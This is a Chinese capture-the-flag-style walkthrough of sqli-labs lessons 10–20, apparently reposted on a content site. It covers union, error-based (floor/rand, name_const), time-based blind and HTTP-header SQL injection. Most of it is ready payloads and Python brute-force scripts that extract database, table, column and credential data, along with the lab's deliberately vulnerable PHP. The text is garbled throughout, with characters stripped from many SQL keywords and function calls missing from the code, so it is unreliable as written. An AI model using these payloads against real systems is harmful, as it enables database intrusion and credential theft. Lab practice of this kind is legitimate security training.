+--+" 97 data = '' 98 for num in range(1, data_length + 1): 99 for asc in range(32, 128): 100 s_time = () 101 ((num=num, asc=asc)) 102 e_time = () 103 if (e_time - s_time) > 3: 104 data += chr(asc) 105 print(column_name,"字段的值:", data) 106 break 107 if __name__ == '__main__': 108 # databa_length() # 8 109 # databa_name(8) #curity 110 # table_length('curity')#curity 中的所有数据表名长: 29 111 # table_name(29, 'curity')#所有的数据表名: emails@referers@uagents@urs 112 # column_length('urs','curity') #20 113 # column_name(20,'urs','curity')#所有的数据表名: id@urname@password 114 # data_length('urname', 'urs')#91 115 data_detail(91, 'urname', 'urs')#urname 字段的值: Dumb@Angelina@Dummy@cure@stupid@superman@batman@admin@admin1@admin2@admin3@dhakkan@admin4 跟9⼀样就改了个url POST篇 Less-11:post注⼊ 终于开始写post型的了,⼀开始打开这个界⾯真的是⼀脸懵逼,在逛了⼀波攻略,在师傅博客的点播下,才发现这个的套路跟less-1⼀⽑⼀样,就是形似变化⼀下,可能不那 么直接罢了Orz Less-12:双引号+括号闭合 放⼤了⼀点burp,嘻嘻嘻。 Less-13:报错注⼊ 背景知识: 这写是⽹上的⼀位师傅提供的构造,但是他没有详解【果然我还是太菜了,答案都看不懂Orz】 :Duplicate entry '::curity::0' for key 1 ') union lect count(*),concat(0x3a,0x3a,(lect databa()),0x3a,0x3a,floor(rand()*2)) as a from information_ group by a # &passwd=1# &submit=Submit lect count(*),concat(0x3a,0x3a,(lect databa()),0x3a,0x3a,floor(rand()*2))from information_ group by concat(0x3a,0x3a,(lect databa()),0x3a,0x3a,floor(rand()*2)); :Duplicate entry '::5.0.51a-3ubuntu5::0' for key 1 ') union lect count(*),concat(0x3a,0x3a,(lect version()),0x3a,0x3a,floor(rand()*2))as a from information_ group by a # &passwd=1&submit=Submit :Duplicate entry '5.0.51a-3ubuntu5::curity::root@localhost:1' for key 1 ') union lect 1,2 from (lect count(*),concat((lect concat(version(),0x3a,0x3a,databa(),0x3a,0x3a,ur(),0x3a) limit 0,1),floor(rand(0)*2))x from information_ group by x)a # &passwd=1&submit=Submit :Duplicate entry '13::1' for key 1 ') union lect 1,2 from (lect count(*),concat((lect concat(count(*),0x3a, 0x3a) from limit 0,1),floor(rand(0)*2))x from information_ group by x)a # &passwd= ') or 1=1 # &submit=Submit :Duplicate entry 'Dumb::Dumb::1' for key 1 ') union lect 1,2 from (lect count(*),concat((lect concat(urname,0x3a, 0x3a,password,0x3a, 0x3a) from limit 0,1),floor(rand(0)*2))x from information_ group by View Code ') union lect count(*),concat(0x3a,0x3a,(lect databa()),0x3a,0x3a,floor(rand()*2)) as a from information_ group by a # &passwd=1# &submit=Submi 相当于: lect count(*),concat(0x3a,0x3a,(lect databa()),0x3a,0x3a,floor(rand()*2))from information_ group by concat(0x3a,0x3a,(lect databa()),0x3a,0x3a,floor(rand()*2)); 报错类型:”主键重复“ 只要是count,rand(0),group by三个连⽤就会造成这种报错,与位置⽆关 mysql官⽅说,在执⾏group by语句的时候,group by语句后⾯的字段会被运算两次 rand(0)⽣成的序列更稳定 concat()只是把 ":" 和 "数据库名" ,"floor(rand(0)*2)"的执⾏结果连接起来,看起来⽅便的,( 0x3a = : ) 0x03 主键重复 这⾥利⽤到了count()和group by在遇到rand()产⽣的重复值时报错的思路。⽹上⽐较常见的payload是这样的: mysql> lect count(*) from test group by concat(version(),floor(rand(0)*2)); ERROR 1062 (23000): Duplicate entry '5.7.171' for key ' 可以看到错误类型是duplicate entry,即主键重复。实际上只要是count,rand(),group by三个连⽤就会造成这种报错,与位置⽆关: mysql> lect count(*),concat(version(),floor(rand(0)*2))x from information_ group by x; ERROR 1062 (23000): Duplicate entry '5.7.171' for key ' 这种报错⽅法的本质是因为floor(rand(0)*2)的重复性,导致group by语句出错。group by key的原理是循环读取数据的每⼀⾏,将结果保存于临时表中。读取每⼀⾏的key时,如果key存在于临时 表中,则不在临时表中更新临时表的数据;如果key不在临时表中,则在临时表中插⼊key所在⾏的数据。举个例⼦,表中数据如下: mysql> lect * from test; +------+-------+ | id | name | +------+-------+ | 0 | jack | | 1 | jack | | 2 | tom | | 3 | candy | | 4 | tommy | | 5 | jerry | +------+-------+ 6 rows in t (0.00 c) 我们以lect count(*) from test group by name语句说明⼤致过程如下: 先是建⽴虚拟表,其中key为主键,不可重复: keycount(*) 开始查询数据,去数据库数据,然后查看虚拟表是否存在,不存在则插⼊新记录,存在则count(*)字段直接加1: keycount(*) jack1 keycount(*) jack1+1 keycount(*) jack1+1 tom1 keycount(*) jack1+1 tom1 candy1 当这个操作遇到rand(0)*2时,就会发⽣错误,其原因在于rand(0)是个稳定的序列,我们计算两次rand(0): mysql> lect rand(0) from test; +---------------------+ | rand(0) | +---------------------+ | 0.15522 | | 0.628 | | 0.6387474552157777 | | 0.33147 | | 0.739218 | | 0.7334 | +---------------------+ 6 rows in t (0.00 c) mysql> lect rand(0) from test; +---------------------+ | rand(0) | +---------------------+ | 0.15522 | | 0.628 | | 0.6387474552157777 | | 0.33147 | | 0.739218 | | 0.7334 | +---------------------+ 6 rows in t (0.00 c) 同理,floor(rand(0)*2)则会固定得到的序列(这个很重要): mysql> lect floor(rand(0)*2) from test; +------------------+ | floor(rand(0)*2) | +------------------+ | 0 | | 1 | | 1 | | 0 | | 1 | | 1 | +------------------+ 6 rows in t (0.00 c) 回到之前的group by语句上,我们将其改为lect count(*) from test group by floor(rand(0)*2),看看每⼀步是什么情况: 先建⽴空表 keycount(*) 取第⼀条记录,执⾏floor(rand(0)*2),发现结果为0(第⼀次计算),查询虚表,发现没有该键值,则会再计算⼀次floor(rand(0)*2),将结果1(第⼆次计算)插⼊虚表,如下: keycount(*) 11 查第⼆条记录,再次计算floor(rand(0)*2),发现结果为1(第三次计算),查询虚表,发现键值1存在,所以此时不在计算第⼆次,直接count(*)值加1,如下: keycount(*) 11+1 查第三条记录,再次计算floor(rand(0)*2),发现结果为0(第四次计算),发现键值没有0,则尝试插⼊记录,此时会⼜⼀次计算floor(rand(0)*2),结果1(第5次计算)当作虚表的主键,⽽此时1 这个主键已经存在于虚表中了,所以在插⼊的时候就会报主键重复的错误了。 最终报错的结果,即主键'1'重复: mysql> lect count(*) from test group by floor(rand(0)*2); ERROR 1062 (23000): Duplicate entry '1' for key ' 整个查询过程中,floor(rand(0)*2)被计算了5次,查询原始数据表3次,所以表中需要⾄少3条数据才能报错(也就是最少要让floor执⾏5次)。关于这个rand()的问题,官⽅⽂档在有个说明: RAND() in a WHERE clau is evaluated for every row (when lecting from one table) or combination of rows (when lecting from a multiple-table join). Thus, for optimizer purpos, RAND() View Code 如果有⼀个序列开头时0,1,0或者1,0,1,则⽆论如何都不会报错了,因为虚表开头两个主键会分别是0和1,后⾯的就直接count(*)加1了: mysql> lect floor(rand(1)*2) from test; +------------------+ | floor(rand(1)*2) | +------------------+ | 0 | | 1 | | 0 | | 0 | | 0 | | 1 | +------------------+ 6 rows in t (0.00 c) mysql> lect count(*) from test group by floor(rand(1)*2); +----------+ | count(*) | +----------+ | 3 | | 3 | +----------+ 2 rows in t (0.00 c) 查表: uname=') union lect count(*),concat(0x3a,(lect table_name from information_ where table_schema=databa() limit 1,1),0x3a,floor(rand(0)*2)) as a from information_ group by a# &passwd=1# &submit=Submit 但是发现还是查不到更加详细的数据: 原来是group_concat()的问题,后来改成limit 0,1过了,但是不知道为什么group_concat失败了: 由于不知道curity库中到底有⼏张表,所以发包后,根据包长的⼤⼩可以看出有4张表: 查字段名: uname=') union lect count(*),concat(0x3a,(lect column_name from information_s where table_schema='curity' and table_name='emails' limit 0,1),0x3a,floor(rand(0)*2)) as a from information_ group by a# &passwd=1# &submit=Submit 接下来同理发包,得到 emails表中只有两个字段: 查emal_id的字段值: uname=') union lect count(*),concat(0x3a,(lect email_id from emails limit 0,1),0x3a,floor(rand(0)*2)) as a from information_ group by a # &passwd=1# &submit=Submit 后记: 在查资料的时候发现了⼀个超级厉害的函数:name_const() name_const(): mysql存储过程中的本地变量会被⼀个内部函数 name_const 转化,似乎是专门为存储过程设计的,没有提到有其它特别之处. ⽤法:union lect 1,2,3 from (lect name_const((你希望的查询语句),1),name_const((你希望的查询语句),1))x # 查表名: =1') union lect 1,3 from (lect name_const((lect table_name from information_ where table_schema='curity' limit 0,1),1),name_const((lect table_name from information_ where table_schema='curity' limit 0,1),1))x# =1') union lect 1,3 from (lect name_const((lect group_concat(table_name,0x20) from information_ where table_schema='curity'),1),name_const((lect group_concat(table_name,0x20) from information_ where table_schema='curity'),1))x# 3.后⾯的以此类推 Less-14:双引号绕过+报错注⼊(更13⼀样) ⽅法⼀: uname=1" union lect 1,3 from (lect name_const((lect table_name from information_ where table_schema='curity' limit 0,1),1),name_const((lect table_name from information_ where table_schema='curity' limit 0,1),1))x#&passwd=12&submit=Submit ⽅法⼆: uname=" union lect count(*),concat(0x3a,(lect email_id from emails limit 0,1),0x3a,floor(rand(0)*2)) as a from information_ group by a # &passwd=1# &submit=Submit Less-15:时间盲注+单引号 终于艰难的写出来了Orz。其中table_name()函数有参考⼀位师傅的脚本,但是我发现他跑到好慢,然后其他的就⽤的是 if 来写了,也懒得改了,⼤家仅供参考。 1 ''' 2 @Modify Time @Author 3 ------------ ------- 4 2019/10/5 18:21 laoalo 5 ''' 12 url = "192.168.199.190/sqli-labs-master/Less-15/" 13 14 15 def databa_length(): 16 global url 17 for i in range(1,10000): 18 s_time = () 19 data = { 20 'uname' : "admin' and if ( length(databa()) < %d , sleep(3) , 1)#" % (i), 21 'passwd': 'admin', 22 # 'submit': 'Submit' 23 } 24 print(data['uname']) 25 (url=url, data=data) 26 e_time = () 27 if (e_time - s_time).conds > 2: 28 print("tttt数据库长:", i-1) 29 break 30 def databa_name(length): 31 global url 32 name="" 33 for j in range(1,length+1): 34 for i in range(32, 128): 35 s_time = () 36 data = { 37 'uname': "admin' and if (ascii (substr(databa(), %d, 1))=%d, sleep(3), 1)#" % ( j , i), 38 'passwd': 'admin', 39 # 'submit': 'Submit' 40 } 41 re=(url=url, data=data) 42 e_time = () 43 print(data['uname']) 44 # print("tttt数据库名:", chr(i)) 45 if (e_time - s_time) > 2: 46 name += chr(i) 47 print("tttt数据库名:", name) 48 break 49 def table_length(): 50 global url 51 for i in range(1, 10000): 52 s_time = () 53 data = { 54 'uname': "admin' and if ( length((lect group_concat(table_name) from information_ where table_schema=databa())) < %d , sleep(3) , 1)#" % (i), 55 'passwd': 'admin', 56 # 'submit': 'Submit' 57 } 58 print(data['uname']) 59 (url=url, data=data) 60 e_time = () 61 if (e_time - s_time).conds > 2: 62 print("tttt所有的数据表长:", i - 1) 63 break 64 def table_name(table_length): 65 global url 66 char = "abcdefghijklmnopqrstuvwxyz_" 67 print("start!") 68 tablename = "" 69 for i in range(0, table_length+1): 70 print("n第 %d 张表的爆破" %(i+1)) 71 for j in range(0, 20): 72 for str in char: 73 # print(str) 74 time1 = () 75 data = { 76 'uname': "admin'and If((mid((lect table_name from information_ where table_schema=databa() limit %d,1),%d,1))='%s',1,sleep(2))#" % (i, j, str), 77 'passwd': "1"} 78 res = (url, data=data) 79 print(data['uname']) 80 time2 = () 81 c = (time2 - time1).conds 82 if c < 1: 83 tablename += str 84 print("表名:",tablename) 85 break 86 87 print("tttt表名:",tablename) 88 def colums_length(table_name): 89 global url 90 for i in range(1,10000): 91 s_time = () 92 data = { 93 'uname' : "admin' and if ( length((lect group_concat(column_name) from information_s where table_name='"+table_name+"' and table_schema=databa())) < %d , sleep(3) , 1)# 94 'passwd': 'admin', 95 # 'submit': 'Submit' 96 } 97 print(data['uname']) 98 (url=url, data=data) 99 e_time = () 100 if (e_time - s_time).conds > 2: 101 print("tttt字段长:", i-1) 102 break 103 def column_name(length,table_name): 104 global url 105 column_name = "" 106 for j in range(1, length + 1): 107 for i in range(32, 128): 108 s_time = () 109 data = { 110 'uname': "admin' and if (ascii (substr((lect group_concat(column_name) from information_s where table_name='"+table_name+"' and table_schema=databa()), %d, 1))=%d, sleep(3), 1)# 111 'passwd': 'admin', 112 # 'submit': 'Submit' 113 } 114 re = (url=url, data=data) 115 e_time = () 116 print(data['uname']) 117 # print("tttt数据库名:", chr(i)) 118 if (e_time - s_time) > 2: 119 column_name += chr(i) 120 print("tttt字段名:", column_name) 121 break 122 def data_length(colums,table): 123 global url 124 for i in range(1, 10000): 125 s_time = () 126 data = { 127 'uname': "admin' and if ( length((lect group_concat("+colums+") from "+table+")) < %d , sleep(3) , 1)#" % (i), 128 'passwd': 'admin', 129 # 'submit': 'Submit' 130 } 131 print(data['uname']) 132 (url=url, data=data) 133 e_time = () 134 if (e_time - s_time).conds > 2: 135 print("tttt所有的数据长:", i - 1) 136 break 137 def data_datail(length,colums,table): 138 global url 139 column_name = "" 140 for j in range(1, length + 1): 141 for i in range(32, 128): 142 s_time = () 143 data = { 144 'uname': "admin' and if (ascii (substr((lect group_concat("+colums+") from "+table+"), %d, 1))=%d, sleep(3), 1)#" % (j, i), 145 'passwd': 'admin', 146 # 'submit': 'Submit' 147 } 148 re = (url=url, data=data) 149 e_time = () 150 print(data['uname']) 151 # print("tttt数据库名:", chr(i)) 152 if (e_time - s_time) > 2: 153 column_name += chr(i) 154 print("tttt字段名:", column_name) 155 break 156 157 if __name__ == '__main__': 158 # databa_length() 159 # databa_name(8) 160 # table_length() 161 # table_name(10) 162 # colums_length('emails') 163 # column_name(11,'emails') 164 # data_length('email_id','emails') 165 data_datail(157,'email_id','emails') 爆破脚本 当然还可以⽤burp直接慢慢发包:例如查数据库长度:直接慢慢发包:例如查数据库长度:uname=admin' and if (length(databa())>1,0,sleep(3))+--+&passwd=admin&submit=Submit 根据时延判断出表长为8: ⾄于sqlmap就算了吧,好⽍是练习⼿动啊喂。 Less-16:双引号+括号+时间盲注 跟15⼀样,脚本改改就可以上 Less-17:表⾯上的双重注⼊ 上源码,可以看到过滤了uname: 1 <?php 2 //including the Mysql connect parameters. 3 include("../sql-connections/"); 4 error_reporting(0); 5 6 function check_input($value) 7 { 8 /** 9 * 第⼀个条件截取长度为15 10 */ 11 if(!empty($value)) 12 { 13 // truncation (e comments) 14 $value = substr($value,0,15); 15 } 16 // Stripslashes if magic quotes enabled 17 /* get_magic_quotes_gpc(): 18 get_magic_quotes_gpc()函数取得PHP环境配置的变量magic_quotes_gpc(GPC, Get/Post/Cookie)值。 19 返回0表⽰本功能关闭,返回1表⽰本功能打开。 20 21 当magic_quotes_gpc打开时, 22 所有的'(单引号)、"(双引号)、(反斜杠)和NULL(空字符) 23 会⾃动转为含有反斜杠的溢出字符。 24 */ 25 26 /* stripslashes(): 27 28 stripslashes(string)函数删除由addslashes()函数添加的反斜杠。 29 30 addslashes(string)函数返回在预定义字符之前添加反斜杠的字符串: 31 单引号 ' 32 双引号 " 33 反斜杠 34 空字符 NULL 35 该函数可⽤于为存储在数据库中的字符串以及数据库查询语句准备字符串。 36 37 注意:默认地,PHP对所有的GET、POST和COOKIE数据⾃动运⾏addslashes()。 38 所以不应对已转义过的字符串使⽤addslashes(),因为这样会导致双层转义。 39 遇到这种情况时可以使⽤函数get_magic_quotes_gpc()进⾏检测。 40 41 */ 42 /** 43 * 第⼆个条件把已有的转义字符去掉 44 */ 45 if (get_magic_quotes_gpc()) 46 { 47 $value = stripslashes($value); 48 } 49 50 // Quote if not a number 51 52 /* 53 ctype_digit(string)函数 54 检查字符串中每个字符是否都是⼗进制数字,若是则返回TRUE,否则返回FALSE。 55 */ 56 /** 57 * 第三个条件对字符型的输⼊进⾏转义 58 */ 59 if (!ctype_digit($value)) 60 { 61 $value = "'" . mysql_real_escape_string($value) . "'"; 62 /* 63 mysql_real_escape_string()函数 64 mysql_real_escape_string(string,connection) 65 66 参数:描述 67 string:必需,规定要转义的字符串 68 connection:可选,规定MySQL连接。如果未规定,则使⽤上⼀个连接 69 mysql_real_escape_string()函数转义 SQL 语句中使⽤的字符串中的特殊字符:x00,n,r,,',",x1a 70 如果成功,则该函数返回被转义的字符串。如果失败,则返回FALSE。 78 { 79 /** 80 * 第四个条件,如果是数字型的输⼊就让他变成数字,PS:话说这样就不能⽤⼗六进制注⼊了吧 81 * 82 */ 83 $value = intval($value); 84 /* 85 86 intval(var[,ba]) 87 参数:描述 88 var:要转换成integer的数量值 89 ba:转化所使⽤的进制 90 intval()函数获取变量的整数值。通过使⽤指定的进制ba转换(默认是⼗进制),返回变量var的integer数值。 91 intval()不能⽤于object,否则会产⽣E_NOTICE错误并返回1。 92 93 成功时返回var的integer值,失败时返回0。 94 空的array返回0,⾮空的array返回1,最⼤的值取决于操作系统。 95 96 如果ba是0,通过检测var的格式来决定使⽤的进制: 97 98 如果字符串包括了0x或0X的前缀,使⽤16进制hex;否则, 99 如果字符串以0开始,使⽤8进制octal;否则, 100 使⽤10进制decimal。 101 */ 102 } 103 return $value; 104 } 105 106 107 // take the variables 108 if(ist($_POST['uname']) && ist($_POST['passwd'])) 109 { 110 //making sure uname is not injectable 111 $uname=check_input($_POST['uname']); 112 113 $passwd=$_POST['passwd']; 114 115 116 //logging the connection parameters to a file for analysis. 117 $fp=fopen('','a'); 118 fwrite($fp,'Ur Name:'.$uname."n"); 119 fwrite($fp,'New Password:'.$passwd."n"); 120 fclo($fp); 121 122 123 // connectivity 124 @$sql="SELECT urname, password FROM urs WHERE urname= $uname LIMIT 0,1"; 125 126 $result=mysql_query($sql); 127 $row = mysql_fetch_array($result); 128 //echo $row; 129 if($row) 130 { 131 //echo ''; 132 $row1 = $row['urname']; 133 //echo 'Your Login name:'. $row1; 134 $update="UPDATE urs SET password = '$passwd' WHERE urname='$row1'"; 135 mysql_query($update); 136 echo " 137 138 139 140 if (mysql_error()) 141 { 142 echo ''; 143 print_r(mysql_error()); 144 echo ""; 尝试基本注⼊: 最后尝试报错注⼊:[ name_const()真好⽤啊喂 ] uname=admin&passwd=' or (lect 1 from (lect count(*),concat_ws('-',(lect databa()),floor(rand(0)*2)) as a from information_ group by a) b) where urname='admin'--+#&submit=Submit uname=admin&passwd=' or (SELECT * FROM (SELECT name_const((lect group_concat(table_name) from information_ where table_schema='curity'),1),name_const((lect group_concat(table_name) from information_ where table_schema='curity'),1)) a)--+ uname=admin&passwd=' or (SELECT * FROM (SELECT name_const((lect group_concat(column_name) from information_s where table_schema='curity' and table_name='emails'),1),name_const((lect group_concat(column_name) from information_s where table_schema='curity' and table_name='emails'),1)) a)--+ uname=admin&passwd=' or (SELECT * FROM (SELECT name_const((lect group_concat(email_id) from emails),1),name_const((lect group_concat(email_id) from emails),1)) a)--+ 详细解析: Less-18:http头注⼊——ur-agent 1 <?php 2 //including the Mysql connect parameters. 3 include("../sql-connections/"); 4 error_reporting(0); 5 78 el 79 { 80 echo ''; 81 //echo "Try again loor"; 82 print_r(mysql_error()); 83 echo ""; 84 echo ""; 85 echo ''; 86 echo ""; 87 } 88 89 } View Code 后⾯的⽼套路。 ' or (SELECT * FROM (SELECT name_const((lect group_concat(email_id) from emails),1),name_const((lect group_concat(email_id) from emails),1)) a) and '1'='1 Less-19:http头注⼊——referer 跟18简直⼀⽑⼀样啊喂。 Referer: ' or (SELECT * FROM (SELECT name_const((lect group_concat(email_id) from emails),1),name_const((lect group_concat(email_id) from emails),1)) a) and '1'='1 Less-20:http头注⼊——cookie+代码审计+报错注⼊ 详细参照17 cookie: uname=' or (lect 1 from (lect count(*),concat_ws('-',(lect databa()),floor(rand(0)*2)) as a from information_ group by a) b)# 注意点: 不要⽤‘ --+ ’ 注释: 不要加submit参数:
";
";
";
本文发布于:2023-11-05 17:27:44,感谢您对本站的认可!
本文链接:https://www.wtabcd.cn/zhishi/a/1699176464207227.html
版权声明:本站内容均来自互联网,仅供演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系,我们将在24小时内删除。
本文word下载地址:【靶场练习_sqli.doc
本文 PDF 下载地址:【靶场练习_sqli.pdf
留言与评论(共有 0 条评论) |